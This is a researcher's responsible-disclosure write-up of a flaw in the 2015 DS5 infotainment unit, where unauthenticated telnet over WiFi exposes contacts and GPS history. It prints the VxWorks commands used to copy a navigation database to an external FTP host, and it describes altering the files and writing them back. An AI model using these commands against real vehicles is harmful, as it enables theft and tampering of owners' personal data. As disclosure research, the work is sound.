My curiosity bought me to the discovery below. I have over the years owned 6 different PSA vehicles. 2 x Citroen C4, Citroen C5, Citroen DS3 THP, Citroen DS3 Cabrio THP and the DS DS5 1955 Special Edition below. This is the first security vulnerability I have found within any device. Here is the document that I produced to inform the manufacturer of the issue.
If you are looking for my Kit Car Diary please use the menu items above for those pages.
Security analysis of the In Vehicle Infotainment system within the Groupe PSA 2015 DS5 1955 Limited Edition - Ian Tabor (ian(at)mintynet.com)
The In Vehicle Infotainment (IVI) system within the 2015 DS5 1955 Limited Edition has a security issue in that an attacker connected to the same WiFi access point or hotspot is able to gain un authenticated access to the Personal Data that is stored within the IVI system. This data includes Contact details, telephone, email, address, GPS and owners GPS history information. It is also possible to modify data on the IVI system. This paper shows how the vulnerability can be exploited to gain access to the data.
I first purchased the vehicle below in July 2015 and was curious about the inbuilt Infotainment system. This allowed you to browse the Internet from the touch screen if you connected to a wireless access point or hotspot.
Below are pictures of the system information for the device initially in September 2015
This information was taken because I was having issues with the GPS system randomly restarting, so requested it be looked at when the vehicle went in for a service.
Having connected to the WiFi, I used NMAP to scan the IP address that was issued to the IVI unit, to the right is the screenshot of the NMAP scan.
Using terminal emulation software I connected to the device over TCP port 23 (telnet) without any authentication and executed commands, ifconfig is shown above, which shows a different IP address range to the wireless connection. The output shows that the device is running VxWorks version 22.214.171.124, Kernel: WIND version 2.13, Made on Nov 23 2015 15:07:17. I did do some searching around about the VxWorks operating system however because the vehicle was my daily driver I parked any investigations, because I didn’t want to "Brick" my daily driver.
While attending 44Con 2016 I did speak to Ken Munro of Pen Test Partners regarding my basic findings, which he then inquired why I hadn't disclosed the details I had found, I explained that I didn't really want to "Brick" my daily driver and at that point I had only really found un authenticated telnet access to the IVI.
In September 2016 I upgraded the MAPs on the GPS system using the USB port and this gave me access to the software files for the unit. I did attempt to use binwalk to have a look inside but didn't reverse engineer software files.
Below are more pictures of the system information of the device after the map upgrade.
In June 2017 I used a laptop to telnet to the IVI and this allowed me to capture more information. Below shows a screenshot of a telnet session from a command prompt showing the VxWorks version and logo.
From within the vehicle I was able to xcopy directories and copy single files from the device to the USB device in the USB port in the centre console.
Below are the sqlite files within the \SYSTEM_DATA folders
Looking through the files in the \USER_DATA folders, there is a sqlite folder containing personal data.
I was able to open the files using sqlite browser on my PC.
I will go through the ones in the USER_DATA folder one by one. Showing structure if available or errors observed.
Agenda.sqlite, no security and the data has been redacted to protect my privacy.
AudioTuner.sqlite / Config_options.sqlite / Diag_zi.sqlite / Diagnosis.sqlite / Dipo_device.sqlite / media_jkb_catalog.sqlite / mlc_device_application.sqlite / Pictures.sqlite / T2BF.sqlite / Trip.sqlite / up_common.sqlite / up_config.sqlite / up_user.sqlite / up_user_hmi.sqlite / version_history.sqlite all come up with the following error message. However you can open the files of the same name within the \SYSTEM_DATA folder without error.
Navigation.sqlite, no security and the data has been redacted to protect my privacy. The CityName consists of Postcode, County and Country.
Nav_dest.sqlite, no security and the data has been redacted to protect my privacy. Within the city_historic table, the Keyword consists of Postcode, County and Country in the same way as Navigation.sqlite.
After finding my personal data available on the filesystem in an unprotected state I had a look through the VxWorks command set to see if it was possible to copy the files off without using the USB port.
The following set of commands were found, 192.168.43.197 was the IP address of my laptop that was running a FTP server which allowed upload and download.
Below is part of the capture that shows the results of the above commands
-> hostAdd "wrs","192.168.43.197"
value = 0 = 0x0
-> netDevCreate ("wrs:","wrs",1)
value = 0 = 0x0
-> iam "anonymous"
value = 0 = 0x0
-> cp "/USER_DATA/user_data/SQLITE/navigation.sqlite","wrs:/navigation.sqlite"
copying file /USER_DATA/user_data/SQLITE/navigation.sqlite -> wrs:/navigation.sqlite
value = 0 = 0x0
I was also able to modify the data in the Navigation.sqlite file and upload back to the IVI unit, the picture shows what happened when I only changed 2 characters round. If I modified the file anymore the IVI would present an empty journey history. I would assume this is because the similarly named .inf file includes a basic checksum of the contents.
Conclusion of my findings
The IVI solution within the 2015 DS5 1955 has a vulnerability in which someone connected to the same WiFi network can use telnet to connect to the device without authentication, remotely map a folder to a FTP server and copy sqlite files and then have access to GPS data, Telephone, Email and Address contact data. I was also able to modify sqlite files and copy them back to the IVI. I was unable to test if the device was beaconing for the WiFi connection and could be tricked in connecting to a WiFi connection without any authentication.
I believe that the In Vehicle Infotainment system is also used within other vehicles in the Groupe PSA range and they will also be susceptible to this vulnerability.
I have been informed by Groupe PSA that their Vehicles have 5 CAN buses (Body, Infotainment, Comfort, Powertrain and Chassis) they are connected together at the Body Control Module which acts as a gateway to control which messages can transfer between the buses. I am told this means that an attacker is unlikely to be able to modify the firmware of the IVI and send spurious data onto the CAN bus and cause issues like ones seen in other car hacking investigations detailed in the references below.
Groupe PSA have informed me that the IVI unit used in this vehicle was used in limited quantities within the Groupe PSA range of vehicles and production of IVI with inbuilt WiFi was ceased in 10/2016. All new IVI hardware in the Groupe PSA vehicles is manufactured without the WiFi component. I have also been informed that a software update is available for the existing WiFi enabled devices which disables the WiFi Hardware which would remove the ability for the attack shown.
The recommendation to owners of Vehicles with the IVI units with the WiFi hardware is to disable the WiFi within the menus on the IVI. This will mean that the vehicle and the data are not vulnerable to the attack outlined in this document.
I would like to thank Ken Munro of Pen Test Partners for the assistance with the responsible disclosure to Groupe PSA.
This work was completed within my own time, on my own vehicle and has nothing to do with my current or previous employer(s).